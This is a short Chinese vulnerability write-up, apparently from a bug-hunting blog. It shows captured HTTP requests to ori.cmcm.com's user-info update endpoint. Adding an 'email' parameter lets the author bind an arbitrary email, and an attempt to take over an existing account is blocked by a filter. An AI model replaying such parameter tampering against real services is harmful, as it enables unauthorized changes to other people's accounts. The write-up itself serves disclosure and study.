1、打开Url:https://ori.cmcm.com/user/index.html
2、点击保存并且抓包,抓取的数据包如下
1 | POST /user/updateoneruserinfo.html HTTP/1.1 |
2 | Host: ori.cmcm.com |
3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
4 | Accept: application/json, text/javascript, */*; q=0.01 |
5 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 |
6 | Accept-Encoding: gzip, deflate |
7 | DNT: 1 |
8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 |
9 | X-Requested-With: XMLHttpRequest |
10 | Referer: https://ori.cmcm.com/user/index.html |
11 | Content-Length: 134 |
12 | Cookie: 这是一个马赛克 |
13 | Connection: close |
14 | |
15 | skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827 |
然后来fuzz
一下,加上email
参数后,数据包如下
1 | POST /user/updateoneruserinfo.html HTTP/1.1 |
2 | Host: ori.cmcm.com |
3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
4 | Accept: application/json, text/javascript, */*; q=0.01 |
5 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 |
6 | Accept-Encoding: gzip, deflate |
7 | DNT: 1 |
8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 |
9 | X-Requested-With: XMLHttpRequest |
10 | Referer: https://ori.cmcm.com/user/index.html |
11 | Content-Length: 134 |
12 | Cookie: 这是马赛克 |
13 | Connection: close |
14 | |
15 | skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827&email=only_free@qq.com |
ok,这里存在任意邮箱绑定,那么我们来绑定一个存在的用户的邮箱来尝试下看看能不能修改存在邮箱的账号
3、注册一个邮箱账号
注册好后登陆进去
4、在2017614104@qq.com
的账号处吧邮箱改成1900065568@qq.com
我去,这里有过滤。。
来试试看看能不能绕过
好吧,绕不过,难受了,只能当任意邮箱绑定提交了(泪奔.png)